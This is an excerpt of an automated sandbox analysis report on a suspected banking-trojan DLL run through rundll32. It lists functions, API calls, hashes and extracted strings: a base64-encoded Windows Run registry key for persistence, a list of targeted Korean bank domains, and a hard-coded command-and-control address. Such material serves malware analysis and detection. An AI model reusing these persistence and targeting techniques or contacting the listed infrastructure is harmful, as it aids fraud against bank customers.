                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
                                                                                                                                      • String ID: %s "%s",WriteErrorLog$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$wfl
                                                                                                                                      • API String ID: 1762869224-1975788281
                                                                                                                                      • Opcode ID: 09b82ed3fa21d08270873fcba192dd1c088d294b030418533f6bf83d9de58f3b
                                                                                                                                      • Instruction ID: 3647a5429755ecec446a2f8ccc26c264e58e26412829948a16bcfe0502dd19e7
                                                                                                                                      • Opcode Fuzzy Hash: 09b82ed3fa21d08270873fcba192dd1c088d294b030418533f6bf83d9de58f3b
                                                                                                                                      • Instruction Fuzzy Hash: E21182B694421CBEFB11D7A4DC86FEB776CEB14354F1004A1F704B9086DAB16FD88AA4
                                                                                                                                      Function 10005318 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,10016AD0), ref: 1000537D
                                                                                                                                      • LdrInitializeThunk.NTDLL(?, ,?,10016AD0), ref: 1000538A
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,00000000,?, ,?,10016AD0), ref: 10005393
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,1001538C,?,00000000,?, ,?,10016AD0), ref: 100053A0
                                                                                                                                      Strings
                                                                                                                                      • , xrefs: 10005382
                                                                                                                                      • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 1000533C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
                                                                                                                                      • API String ID: 2994545307-230412946
                                                                                                                                      • Opcode ID: 3b020e24c8a578c632c56907784a19a060a6d32522b8a51a2964e7663defaab2
                                                                                                                                      • Instruction ID: 7b9eba5214e38b9c0046b44e98cd3c08d7103b83dd10e5a9e8c46b29d818ea5a
                                                                                                                                      • Opcode Fuzzy Hash: 3b020e24c8a578c632c56907784a19a060a6d32522b8a51a2964e7663defaab2
                                                                                                                                      • Instruction Fuzzy Hash: 6C01B53690431D7AFB12EB64CC41FCE7B59EF482C2F040479FA487A096DBB5BAC54A90
                                                                                                                                      Function 10004630 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 103libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,\*.*,?,?), ref: 1000466E
                                                                                                                                      • wsprintfA.USER32 ref: 100046C3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunkwsprintf
                                                                                                                                      • String ID: %s\%s$.$\*.*
                                                                                                                                      • API String ID: 2324811901-2210278135
                                                                                                                                      • Opcode ID: c8dc6191325d0a066ef2ee04b5eafb8e92097f0a8145ee8dbbcb18372a2fd474
                                                                                                                                      • Instruction ID: f5f062f8905d167b997c6355d0c7bab38e41e78a09b79b991177f9edbeb39cb3
                                                                                                                                      • Opcode Fuzzy Hash: c8dc6191325d0a066ef2ee04b5eafb8e92097f0a8145ee8dbbcb18372a2fd474
                                                                                                                                      • Instruction Fuzzy Hash: 95319DB6C0025CBBEF12DFA4CC46EDE7B78EF05390F0405A6F618A6055DB30AB989B50
                                                                                                                                      Function 10006A6E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64sleepthreadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B50,00000000,00000000,?,?,00000202,?), ref: 10003EDA
                                                                                                                                      • GetLastError.KERNEL32 ref: 10006AA8
                                                                                                                                        • Part of subcall function 10006499: wsprintfA.USER32 ref: 100064F7
                                                                                                                                        • Part of subcall function 10006499: ___crtGetTimeFormatEx.LIBCMT ref: 10006546
                                                                                                                                      • Sleep.KERNEL32(0002BF20), ref: 10006ADD
                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000687E,00000000,00000000,00000000), ref: 10006AF1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create$ErrorFormatLastMutexSleepThreadTime___crtwsprintf
                                                                                                                                      • String ID: 0x5d65r455f$5762479093
                                                                                                                                      • API String ID: 3244495550-2446933972
                                                                                                                                      • Opcode ID: c03ba4a081020bfdd3309630d10a7bcdbe0af8bd8e535028a7987193fc45222b
                                                                                                                                      • Instruction ID: 325b642b3227e7783157f4dbf46b27218333242e6ebaac23ecbdbf3e0d4f9812
                                                                                                                                      • Opcode Fuzzy Hash: c03ba4a081020bfdd3309630d10a7bcdbe0af8bd8e535028a7987193fc45222b
                                                                                                                                      • Instruction Fuzzy Hash: 0A0145769442187EF211E3B09CC6CBF3A4DCB963E0F240039FA049A08BDA25AC1541B2
                                                                                                                                      Function 1000C39A Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 467COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: /$UT
                                                                                                                                      • API String ID: 0-1626504983
                                                                                                                                      • Opcode ID: d1385d4c8eda0160eaf8ffe58f1b5828de801106f817f5cd3ba59b5b2734f163
                                                                                                                                      • Instruction ID: 9749cb303701225e843429815a229fc3c71e96fc98374eea56fab15d36df2ae9
                                                                                                                                      • Opcode Fuzzy Hash: d1385d4c8eda0160eaf8ffe58f1b5828de801106f817f5cd3ba59b5b2734f163
                                                                                                                                      • Instruction Fuzzy Hash: D702D375A0438D9BEB21CF68C845F9EB7F9EF04380F1044AEE449A7246DB70AA85CB15
                                                                                                                                      Function 10005CF7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005C92,?,?,%s\lang.ini,100167C0), ref: 10003F76
                                                                                                                                      • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                      • String ID: %s\lang.ini$http://$search
                                                                                                                                      • API String ID: 1721638100-482061809
                                                                                                                                      • Opcode ID: e4bfb2394a1271f0cc96f64fc01ec0e3f910cc59e84c299b65da0151ae5ece77
                                                                                                                                      • Instruction ID: b3bc656a91bf72a69bb9aa1d368438114750f6a640d27bcd72447e1c911250d4
                                                                                                                                      • Opcode Fuzzy Hash: e4bfb2394a1271f0cc96f64fc01ec0e3f910cc59e84c299b65da0151ae5ece77
                                                                                                                                      • Instruction Fuzzy Hash: CE1129769081197FFB61DAA4CC42FDB376CDB103D5F104572FB58A90C1EA71ABC44A60
                                                                                                                                      Function 10008086 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 117sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID: 107.163.56.236:18963/main.php$L2ltYWdlLnBocA==$P
                                                                                                                                      • API String ID: 3472027048-601847069
                                                                                                                                      • Opcode ID: 4bd395b5c39b339fde20a7b994d70c682e280e2b79e8e391a426fbe1b63a5ed1
                                                                                                                                      • Instruction ID: 77f260ac7bb8c9f3f474dde5afccc9ac44bc59399944368113247b9a9829aeda
                                                                                                                                      • Opcode Fuzzy Hash: 4bd395b5c39b339fde20a7b994d70c682e280e2b79e8e391a426fbe1b63a5ed1
                                                                                                                                      • Instruction Fuzzy Hash: 8231A3779042596EEB12CBB4DC41BDA7BBCFF14350F1404E6E248E6182EB709B888B20
                                                                                                                                      Function 10004192 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,log.txt), ref: 100041B2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: %s%s$log.txt
                                                                                                                                      • API String ID: 2994545307-1489102009
                                                                                                                                      • Opcode ID: 7d1c1fc59e0827c0da4d3170332d1142b0c483cd5d31f57e84fca59f02178f46
                                                                                                                                      • Instruction ID: 0af402a89f3107be0608909a3824c41c43b2ef279e1aa3985814f3388e4b3e0f
                                                                                                                                      • Opcode Fuzzy Hash: 7d1c1fc59e0827c0da4d3170332d1142b0c483cd5d31f57e84fca59f02178f46
                                                                                                                                      • Instruction Fuzzy Hash: 6D2183B794021C7EEB11D6A4DC85EDF776DDF04390F5044A2FB0DEA081DA74BE858A64
                                                                                                                                      Function 10005C4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005C92,?,?,%s\lang.ini,100167C0), ref: 10003F76
                                                                                                                                      • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                      • String ID: %s\lang.ini$http://
                                                                                                                                      • API String ID: 1721638100-679094439
                                                                                                                                      • Opcode ID: 69a7a60b5ab7e44370f6798fbdd4a5d305837c05220455133b7ee2941a8c65fa
                                                                                                                                      • Instruction ID: 275623b6bb4d38d455d16e038d1f67d5d5eba5b08857937f3fa6caa2442e2442
                                                                                                                                      • Opcode Fuzzy Hash: 69a7a60b5ab7e44370f6798fbdd4a5d305837c05220455133b7ee2941a8c65fa
                                                                                                                                      • Instruction Fuzzy Hash: 131104769041197EFB21DAA4CC42FDB776CDB14384F0085B1FA48B6080EA71AF884660